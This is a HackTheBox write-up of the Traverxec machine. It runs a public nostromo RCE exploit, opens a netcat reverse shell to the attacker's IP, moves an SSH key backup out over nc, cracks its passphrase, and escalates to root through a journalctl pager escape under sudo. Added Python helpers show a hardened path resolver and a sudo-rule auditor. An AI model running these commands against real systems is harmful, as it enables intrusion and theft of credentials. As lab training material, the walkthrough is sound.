Traverxec - [HTB]

Marmeus

Introduction

Traverxec is an easy Linux machine from HackTheBox where the attacker has to exploit a vulnerability in the nostromo web server to get a shell as www-data. Then, a backup of SSH keys has to be found and its passphrase cracked in order to become the user david. Finally, the journalctl pager has to be triggered through sudo to escalate privileges to root.

Enumeration

As always, let's start by finding all the open ports on the machine with nmap.

kali@kali:~/Documents/HTB/Traverxec$ sudo nmap -sS -p- -n -T5 -oN AllPorts.txt 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.046s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
# Nmap done at Thu Jul 15 10:14:31 2021 -- 1 IP address (1 host up) scanned in 56.48 seconds

Then, we continue with a deeper scan of every open port, getting more information about each service.

kali@kali:~/Documents/HTB/Traverxec$ sudo nmap -sC -sV -n -T5 -oN PortsDepth.txt -p 22,80 10.10.10.165
Nmap scan report for 10.10.10.165
Host is up (0.051s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looking at the nostromo service, there is a website titled TRAVERXEC.

Traverxec web

The web page itself isn't useful at all, but the nmap output gives us the nostromo version, which has a known vulnerability (CVE-2019-16278, a directory traversal that leads to remote code execution).

kali@kali:~/Documents/HTB/Traverxec$ searchsploit nostromo 1.9.6
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
nostromo 1.9.6 - Remote Code Execution    | multiple/remote/47837.py
------------------------------------------ ---------------------------------
Shellcodes: No Results

Exploitation

First of all, we need to delete the 10th line of the script in order to make it work: it only contains the original file name, shown below, which is not valid Python. The script is also written for Python 2 (it sends str objects over the socket), so run it with a Python 2 interpreter.

 10 cve2019_16278.py

Now, we are able to obtain RCE executing the exploit.

kali@kali:~/Documents/HTB/Traverxec$ python 47837.py 10.10.10.165 80 id

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    

HTTP/1.1 200 OK
Date: Thu, 15 Jul 2021 15:23:36 GMT
Server: nostromo 1.9.6
Connection: close

uid=33(www-data) gid=33(www-data) groups=33(www-data)

In order to obtain a proper reverse shell, we can make the exploit run netcat back to our listener (the target's nc supports -e, as the connection below shows).

kali@kali:~/Documents/HTB/Traverxec$ python 47837.py 10.10.10.165 80 "nc -e /bin/sh 10.10.14.101 4444"

kali@kali:/media/sf_2_MisPostsBlog/HTB/Traverxec$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.101] from (UNKNOWN) [10.10.10.165] 38162
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Privilege escalation 1

Inside nostromo's configuration folder there is a configuration file named nhttpd.conf which contains an interesting setting about home directories.

www-data@traverxec:/var/nostromo$ cat conf/nhttpd.conf 
[...]
# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

Looking at the nostromo documentation, these two settings mean that a request for /~user/ is served from the public_www folder inside that user's home directory, so every user's ~/public_www is exposed over HTTP.
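As an added example (not nostromo's own code), the following Python reads those two settings and maps a /~user/ request to the file the server would serve; the /~user/ semantics come from the nostromo documentation, while the decoding and containment checks are the hardened behaviour one would want, not a description of how nhttpd 1.9.6 actually validates paths. The configuration excerpt is constructed to match the settings seen above.

```python
import os
import urllib.parse

# Constructed excerpt matching the settings seen in /var/nostromo/conf/nhttpd.conf.
SAMPLE_CONF = """\
# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www
"""


def parse_homedirs(conf_text: str) -> dict:
    """Pick the homedirs settings out of an nhttpd.conf-style text."""
    cfg = {}
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] in ("homedirs", "homedirs_public"):
            cfg[parts[0]] = parts[1].strip()
    return cfg


def resolve_userdir(url_path: str, cfg: dict):
    """Map a /~user/... request to the file under <homedirs>/<user>/<homedirs_public>.

    Returns None for anything that is not a user-directory request, that
    carries control characters (the %0d trick of CVE-2019-16278), or that
    would land outside the public directory after decoding and normalisation.
    Decoding happens before every check so that no encoded form of ".." can
    slip past, which is exactly the bug class this page exploits.
    """
    if "homedirs" not in cfg:
        return None  # feature disabled: no /~user/ mapping at all
    decoded = urllib.parse.unquote(url_path)
    if any(ch in decoded for ch in "\r\n\0"):
        return None
    if not decoded.startswith("/~"):
        return None
    user, _, rest = decoded[2:].partition("/")
    if not user or user.startswith("."):
        return None
    base = os.path.normpath(
        os.path.join(cfg["homedirs"], user, cfg.get("homedirs_public", ""))
    )
    full = os.path.normpath(os.path.join(base, rest))
    if full != base and not full.startswith(base + os.sep):
        return None
    return full
```

With the settings above, `/~david/protected-file-area/backup-ssh-identity-files.tgz` resolves to `/home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz`, while `/~david/../.ssh/id_rsa` and its percent-encoded variants are rejected.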

Furthermore, david's home directory has the execute bit set for everyone but not the read bit (drwx--x--x below), so www-data cannot list it but can still traverse into paths it already knows, such as public_www.

www-data@traverxec:/$ ls -la /home/     
total 12
drwxr-xr-x  3 root  root  4096 Oct 25  2019 .
drwxr-xr-x 18 root  root  4096 Oct 25  2019 ..
drwx--x--x  6 david david 4096 Jul 15 07:49 david

Inside public_www there is a folder named protected-file-area containing a backup of SSH identity files. The .htaccess file next to it is how nostromo restricts a directory with HTTP authentication, but that only applies to requests going through the web server; with a shell as www-data we can read the archive directly from disk.

www-data@traverxec:/home/david/public_www$ ls -la protected-file-area/
total 16
drwxr-xr-x 2 david david 4096 Oct 25  2019 .
drwxr-xr-x 3 david david 4096 Oct 25  2019 ..
-rw-r--r-- 1 david david   45 Oct 25  2019 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25  2019 backup-ssh-identity-files.tgz

After transferring it to our machine with netcat, we obtain david's identity files.

www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.14.101 4445 < backup-ssh-identity-files.tgz
kali@kali:~/Documents/HTB/Traverxec$ nc -nlvp 4445 > backup-ssh-identity-files.tgz
kali@kali:~/Documents/HTB/Traverxec$ tar -xvzf backup-ssh-identity-files.tgz 
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

However, the private key is protected with a passphrase.

kali@kali:~/Documents/HTB/Traverxec$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 

Nonetheless, we can recover it with John the Ripper. Note that john only treats an argument as a wordlist when it is given as --wordlist=<file>; passed bare as below, rockyou.txt is taken for another hash file and john falls back to its default password.lst, as the "Proceeding with wordlist" line confirms. The passphrase happens to be in that default list; to really use rockyou, run john --wordlist=/usr/share/wordlists/rockyou.txt sshHash.txt.

kali@kali:~/Documents/HTB/Traverxec$ /usr/share/john/ssh2john.py id_rsa > sshHash.txt
kali@kali:~/Documents/HTB/Traverxec$ john sshHash.txt /usr/share/wordlists/rockyou.txt 
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
hunter           (id_rsa)

Now we are able to access the machine as david through SSH.

kali@kali:~/Documents/HTB/Traverxec$ ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Thu Jul 15 14:46:48 2021 from 10.10.14.152
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Privilege escalation 2

Inside the home folder there is another directory named bin with some scripts in it.

david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ ls bin/
server-stats.head  server-stats.sh  tac

The script server-stats.sh runs the journalctl binary through sudo.

david@traverxec:~$ cat bin/server-stats.sh 
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat 

Hence, there must be a sudoers rule letting david run that exact command line, and indeed it works outside the script as well (sudo -l would show the rule).

david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service 
-- Logs begin at Thu 2021-07-15 14:10:13 EDT, end at Thu 2021-07-15 17:30:23 EDT. --
Jul 15 14:53:36 traverxec su[26169]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=root
Jul 15 14:53:39 traverxec su[26169]: FAILED SU (to root) www-data on none
Jul 15 14:53:48 traverxec su[26171]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rhost=  user=root
Jul 15 14:53:51 traverxec su[26171]: FAILED SU (to root) www-data on none

Looking at GTFOBins there is a section on escalating privileges through journalctl: when its standard output is a terminal and the output does not fit on the screen, journalctl hands it to a pager (less by default), and from less the command !/bin/bash spawns a shell as the user running journalctl, here root. This is why the script pipes the output into cat, so no pager is ever started. In my case the pager didn't activate automatically either, because -n5 prints only five lines and they fit on the terminal, so I had to trigger it manually by shrinking the terminal height. For doing so, execute the following commands, typing !/bin/bash at the less prompt.

david@traverxec:~$ stty rows 2
david@traverxec:~$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2021-07-15 14:10:13 EDT, end at Thu 2021-07-15 17:35:53 EDT. --
!/bin/bash
root@traverxec:/home/david# cd
root@traverxec:~# cat root.txt 
[CENSORED]
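The check a defender would want here is whether any sudo rule hands a user a pager-spawning binary without the pager disabled. The following audit script is an added example, not part of the writeup: it parses `sudo -l` style output and flags such rules. The writeup never shows `sudo -l`, so the sample output below is constructed; its first rule matches what david is shown running, and the second is a hardened variant (`--no-pager` plus sudo's NOEXEC tag, which stops the pager from exec'ing a shell) included for contrast. The list of pager spawners is an assumption drawn from GTFOBins.

```python
import os
import re

# Programs that hand their output to a pager (less by default) when stdout is
# a terminal and the text does not fit on screen. From the pager, "!/bin/bash"
# runs a shell with the pager's privileges (see GTFOBins). Assumed list.
PAGER_SPAWNERS = {"journalctl", "systemctl", "man", "less", "more"}

# Constructed `sudo -l` output: the writeup never shows it, only that david
# can run the first line through sudo. The second rule is a hardened variant
# added here for contrast.
SAMPLE_SUDO_L = """\
Matching Defaults entries for david on traverxec:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User david may run the following commands on traverxec:
    (ALL) NOPASSWD: /usr/bin/journalctl -n5 -unostromo.service
    (ALL) NOEXEC: NOPASSWD: /usr/bin/journalctl --no-pager -n5 -unostromo.service
"""

# "(runas) TAG: TAG: command args" as printed by sudo -l.
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*?)\s*$"
)


def parse_sudo_l(text: str) -> list:
    """Extract {runas, tags, cmd} records from `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip(":") for t in m.group("tags").split()}
        rules.append({"runas": m.group("runas"), "tags": tags, "cmd": m.group("cmd")})
    return rules


def pager_escape_candidates(rules: list) -> list:
    """Return the commands from which a pager shell escape is plausible.

    A rule is flagged when the binary is a known pager spawner, the pager is
    not disabled with --no-pager, and the NOEXEC tag is absent.
    """
    flagged = []
    for rule in rules:
        argv = rule["cmd"].split()
        if not argv:
            continue
        prog = os.path.basename(argv[0])
        if prog not in PAGER_SPAWNERS:
            continue
        if "--no-pager" in argv[1:] or "NOEXEC" in rule["tags"]:
            continue
        flagged.append(rule["cmd"])
    return flagged


if __name__ == "__main__":
    for cmd in pager_escape_candidates(parse_sudo_l(SAMPLE_SUDO_L)):
        print("pager escape possible via sudo:", cmd)
```

On the sample input only the first rule is reported. Piping the output to cat inside the script, as server-stats.sh does, is not a fix, since the sudoers entry itself still allows the bare command; the rule should carry --no-pager (and ideally NOEXEC) so that the pager can never start no matter how the command is invoked.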